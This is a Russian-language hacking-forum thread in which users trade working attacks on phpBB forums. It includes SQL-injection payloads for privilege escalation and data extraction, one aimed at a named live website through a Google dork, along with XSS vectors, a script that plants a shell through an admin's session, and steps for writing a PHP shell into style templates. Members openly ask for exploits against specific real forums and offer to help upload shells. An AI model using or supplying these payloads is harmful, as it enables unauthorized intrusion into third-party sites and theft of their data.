![]() |
Цитата:
|
Есть 2 вопроса:
1) с какой версии 2ой ветки в куках перестали храниться хэши? 2) имея куки админа, в админку версии 2.0.23 никак не зайти? ====================== Elekt пишет 1) с 2.0.19 2) в админке толи своя сессия(нужен хсс в админке), толи надо заставить админа залогиниться в админку, тогда сессия облагородится. |
phpBB3 addon prime_quick_style GetAdmin Vulnerability
################################################## ######################## # # phpBB3 addon prime_quick_style GetAdmin Exploit # # Vulnerability found and exploited by -SmoG- # # target file: prime_quick_style.php # # # vuln: POST parameter "prime_quick_style" is injectable. # source: http://www.phpbb.com/community/viewtopic.php?f=70&t=692625 # # HowTo: after login, go to "./ucp.php" and manipulate the content from the "prime_quick_style"-parameter. # example: prime_quick_style = "5,user_type = 3, user_permissions = ''" # # query will be look like this: "UPDATE USER_TABLE SET user_style = ANY_STYLE(integer), user_type = 3, user_permissions = '' WHERE user_id = YourId" # # gratz, now u will be an admin :) # # --- greetz to Pronoobz.org --- AbiDez, ChinaSun and ~dp~ || Thanks you a lot! --- # # # -( by -SmoG- )- ################################################## ######################## # milw0rm.com [2009-09-01] |
Уязвимость: E-Mail send XSRF (CSRF) Vulnerability.
Описание: Собственно, работает лишь в phpbb2, в 3 версии уже закрыта. Эксплойт: Код:
<html> |
Активный межсайтовый скриптинг и автозагрузка шелла в phpBB 3.0.x-3.0.6
1. Активный межсайтовый скриптинг phpBB 3.0.x-3.0.6.
BB-тег [flash] неотфильтрован чуть менее, чем полностью. [flash=1,1]javascript:confirm(/lo/);//lo[/flash] По умолчанию данный тег недоступен для зарегистрированных пользователей, но его можно разрешить для использования в личных сообщениях. Работоспособность : Opera & Safari Но есть ли там ещё XSS? O, да! 2. Автозагрузка шелла/ бэкдора и т.д. через XSS. Для работы скрипта требуется, чтобы администратор был авторизован в админ. панеле. Эксплойт реализует метод, описанный здесь: https://forum.antichat.ru/showpost.php?p=1176333&postcount=36: * Скрипт не станет повторно добавлять php-код, если он уже имеется в шаблоне. * В логе администратора удаляются записи только о произведенных действиях. Шелл будет доступен по адресу: http://vulnsite.xz/forum/ucp.php?mode=login&lo=test Также рекомендуется ознакомиться с этим https://forum.antichat.ru/showpost.php?p=1231741&postcount=37 Эксплойт: Код:
/*/ phpBB 3.0.x-3.0.6 shell-inj. |
Target: phpbb2*
Dork: inurl:"kb.php?mode=cat" Example: Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=13Код:
http://aquaticreefsystems.com/forum/kb.php?mode=cat&cat=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+phpbb_kb_categories+group+by+2+limit+1)a)PS: актуально для 4.1<=MySQL=>5 |
Цитата:
Цитата:
|
Версия - 2.x
Может я не увидел, и эта информация где-то должна отображатся, но всё же отпишу. Если у вас есть админка, и вам нужно узнать префикс для заливки шелла, делаем несколько банальных действий. Общие настройки - Резервная копия БД - Копировать только структуру(пташка) - начать копирование, файл скачивается и собственно в нём уже и смотрим префикс. Такая вот маленькая полезность. Может ещё кому пригодится. |
===========================================
PHPBB 3.0.* CMS SQL Injection Vulnerability =========================================== # Exploit Title: PHPBB 3.0.* CMS SQLinjection # Date: 2010-08-27 # Team: eX.ploit ( Abjects #ex.ploit ) # Software Link: http://www.phpbb.com/ # Version: PHPBB3.0.* CMS only (does not work on FORUM only) # Tested on: Linux # Usage: SQLinjection # Gain detailed database information Google dork:[inurl:mypage.php?id= & "Powered by phpBB"] # Tested on:linux/php Url| http://www.website.com/news_view.php?id=1 Vuln: http://www.website.com/news_view.php?id=1+and+1=0+ Union Select UNHEX(HEX([visible])) ,2,3,4 # Inj3ct0r.com [2010-08-27] |
так же версию продукта можно определить
forum/styles/prosilver/style.cfg |
Цитата:
Да действительно работает даже на версии 3.0.8 м.б. есть еще что то что можно проверить? выдает: Код HTML:
#более никаких ответов узнать не удалось хотя перелопатил кучу инфы на все запросы был ответ - " Forbidden You don't have permission to access /styles/ on this server. " не появиось ли чего новенького для 3.0.8 ? |
Цитата:
Однако оба этих файла не могут дать твёрдой уверенности, т.к. не всегда обновляются админами при смене версии движка. Определить версию 3.0.8 можно по косвенным признакам: 1) Наличие файла forum/web.config (*nix отдаст как текст) 2) Ошибка 403 при запросе файлов из папки forum/includes/ (например, forum/includes/functions.php), в более старых версиях открывается чистая страница (ибо exit). Цитата:
Цитата:
|
интересно. версия точно 3.0.8 все описанные выше косвенные признаки присутствуют,includes/ закрыты видимо .htaccess -ом и т.п.
довольно интересно, нет ли каких либо советов? какие то недо конца или плохо закрытые ветки ? м.б. инъекции уже появились? |
phpBB 3.0.7
Код:
###################################################################### |
SSSetuPPP, это же бред.
Файл common.php закрыт через .htaccess, во всех файлах из папки /includes/ при прямом запросе срабатывает exit, да и переопределние переменной phpbb_root_path ничего не сможет дать. Хотя указанный выше "эксплоит" ничего и не способен переопределить. |
phpBB Version 3.0.7 Remote File Include Vulnerability
_http://www.inj3ct0r.com/exploits/12604 _http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/ |
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
[CODE] #!/usr/bin/perl # --------------------------------------------------------------- # phpBB 3 (Mod Tag Board get($host.injection($i,$chars[$j])); $time2 = time(); if($time2 - $time1 > 6) { syswrite(STDOUT,chr($chars[$j])); $hash .= chr($chars[$j]); last; } if($i == 1 && length $hash |
Уязвимость в phpbb 2.0.19
Уязвимость позволяет забанить всех пользователей на форуме, что в свою очередь может вызвать сбой в работе базы данных. Суть ошибки состоит в том, что при авторизации пользователя можно вести неверные данные x-раз, что приведет к бану соответствующего пользователя форума на определенное время указное в админке форума и пользователь при авторизации увидит следующее - (Максимальное количество попыток (X) войти на форум было исчерпано. Вы не сможете войти на форум в последующие Y минут.) или произойдет ошибка в базе данных (phpBB : Critical Error Could not connect to the database). Эксплоит (написан на php) Собирает в файл Ники всех пользователей форума. Код:
Профиль пользователя (.*)/i",$str,$return))1. Если не зарегеным пользователям можно смотреть профайл других (иначе придеться еще посылать строку с вашими куками) 2. Правильно настроен preg_match("/nowrap=\"nowrap\">Профиль пользователя (.*)/i",$str,$return)) в некоторых форумах придеться немного изменить, если допустим имя юзверя находиться в титле Юзер - Lamer то переписываем preg_match как preg_match("/Юзер - (.*)/i",$str,$return)) Сам сплоит Код:
Защита Убрать ограничение на число входов с неправильным паролем или увеличить его число через админку форума. |
Есть какие нибудь способы заливки шелла в 3.0.9 ?
Админ аккаунт имеется.. |
А в 3.0.8 есть возможность залить? Админка есть
|
stepashka_, cylaaan =>
1. /showpost.php?p=198446&postcount=3 2. 1) Вкладка общие --> Безопасность Разрешить php в шаблонах: Да 2)Вкладка Стили --> Компоненты стилей ->> Шаблоны С помощью встроенного редактора шаблонов выбираем файл и пишем в него: PHP код:
|
phpBB => `Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group` Тип: полный путь.Необходимо:админская учётная запись. 1.)Заходим в администраторскую панель. 2.)Переходим на вкладку PHPBB SEO. 3.)Находим на этой страничке "The cache folder configured is" и после этих слов и будет полный путь. P.S Полезно, если file_priv=Y, а пути мы не знаем |
Osstudio, данная вкладка не является стандартной для форума phpBB3, она является управляющей частью дополнения phpBB SEO от одноимённой команды www.phpbb-seo.com
Определить наличие данной модификации можно по значку http://demo.phpbb-seo.net/images/phpbb-seo.png внизу форума. |
Цитата:
|
шелл в стилях, для редактирования шаба доступны только два файла
overall_header.html и ph.html куда они инклудятся? |
Цитата:
|
нет, я не так выразился
объясню на примере когда правили в стилях faq_body.html, то что мы исправили было по адресу /forum/faq.php а где сейчас искать мне этот php файл? |
Я думаю, что overall_header.html инклудится в index.php. Попробуй.
|
overall_header.html инклудится на каждой странице форума, за исключением некоторых технических. Это общая шапка.
Файла ph.html в стандартной поставке phpBB3 нет, поэтому инклудится он может куда угодно. Да, если шелл в файле стиля прописан через теги , то ничего не выйдет, эти теги вырезаются. |
там версия 3.0.6, я скачал исходники, устроил поиск по файлам, и везде где он инклудитя — файлы html, лежащие в /templates/
секондлайф, пхпкод прописан в Код:
ph.html по моим догадкам это page_header.html, но и его тоже нигде не нашло |
faza02, стукни в 433230838, помогу залить.
|
есть чо под 3,0,7?
|
justonline,
http://www.exploit-db.com/exploits/2007/ http://www.allinfosec.com/2010/06/09/phpbb-version-3-0-7-remote-file-include-vulnerability/ SecondLife, отписал. |
сплоит на 2.0.17 скиньте плиз... тот что на 1 странице, линк дохлый
|
Цитата:
больше ничего не нашел. |
Как решить проблему.
Есть база данных, в ней имеется отдельная бд в этой бд phpbb. Думаю залить шелл т/к/ данные админа на руках. Проблема в том что не могу найти урл форума. Как узнать урл форума если ты в бд форума ? Пробовал вытащить название темы и поискать в гуугле, но результат не получен. Пробовал так же искать из phpbb_sitelist там записей 0. |
Phpbb 3.0 memberlist.php SQL injection
to ex'pert Попробуйте данный сплойт Цитата:
|
cat1vo, спасибо! Однако порылся в других файлах сайта и оказалось что там версия 3.0.10 на самом деле((. Админ изначально пытался скрыть, но я нашел истинную версию форума. На ней старый експлоит не работает. Теперь подскажите пожалуйста на новую)
|
есть что то новое под 3.0.10 ?
|
Цитата:
------------------------------------------------------------------ Date : 27.07.2012 ------------------------------------------------------------------ Site : www.phpbb.com ------------------------------------------------------------------ Version : 3.0.10 ------------------------------------------------------------------ 1) What is it? This is very nice forum board. You should try it! ------------------------------------------------------------------ 2) Type of bug? SQL Injection (or SQL-info-Leak if You want). ------------------------------------------------------------------ 3) Where is the bug? Vulnerable parameter seems to be 'style' because if we set up this parameter to 'bigger number' (for example: 111111111) we will get an error, with full SQL statement. *updated - dateformat is the second vulnerable parameter! *updated - post_st is the 3rd vulnerable parameter! *updated - another one: topic_st 4) PoC traffic from Burp: 4.1) Request : --- POST /kuba/phpBB/phpBB3/ucp.php?i=prefs&mode=personal HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://localhost/kuba/phpBB/phpBB3/ucp.php?i=174 Cookie: style_cookie=null; phpbb3_t4h3b_u=2; phpbb3_t4h3b_k=; phpbb3_t4h3b_sid= Content-Type: application/x-www-form-urlencoded Content-Length: 258 Connection: close viewemail=1 &massemail=1 &allowpm=1 &hideonline=0 &notifypm=1 &popuppm=0 &lang=en &style=%2b1111111111 &tz=0 &dst=0 &dateoptions=D+M+d%2C+Y+g%3Ai+a &dateformat=D+M+d%2C+Y+g%3Ai+a &submit=Submit &creation_time=1343370877 &form_token=576... --- 4.2) Response: --- HTTP/1.1 503 Service Unavailable Date: Fri, 27 Jul 2012 06:39:06 GMT Server: Apache/2.2.22 (Ubuntu) X-Powered-By: PHP/5.3.10-1ubuntu3.2 Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2889 Return to the index page General Error SQL ERROR [ mysqli ] Out of range value for column 'user_style' at row 1 [1264] SQL UPDATE phpbb_users SET user_allow_pm = 1, user_allow_viewemail = 1, user_allow_massemail = 1, user_allow_viewonline = 1, user_notify_type = '0', user_notify_pm = 1, user_options = '230271', user_dst = 0, user_dateformat = 'D M d, Y g:i a', user_lang = 'en', user_timezone = 0, user_style = 1111111111 WHERE user_id = 2 BACKTRACE FILE: [ROOT]/includes/db/mysqli.php LINE: 182 CALL: dbal->sql_error() FILE: [ROOT]/includes/ucp/ucp_prefs.php LINE: 100 CALL: dbal_mysqli->sql_query() FILE: [ROOT]/includes/functions_module.php LINE: 507 CALL: ucp_prefs->main() FILE: [ROOT]/ucp.php LINE: 333 CALL: p_master->load_active() Please notify the board administrator or webmaster: (...) --- 4.2 Other response (this time from post_st parameter): --- Return to the index page General Error SQL ERROR [ mysqli ] Incorrect integer value: 'javascript:alert(123123);/' for column 'user_post_show_days' at row 1 [1366] An SQL error occurred while fetching this page. Please contact the |
| Время: 07:56 |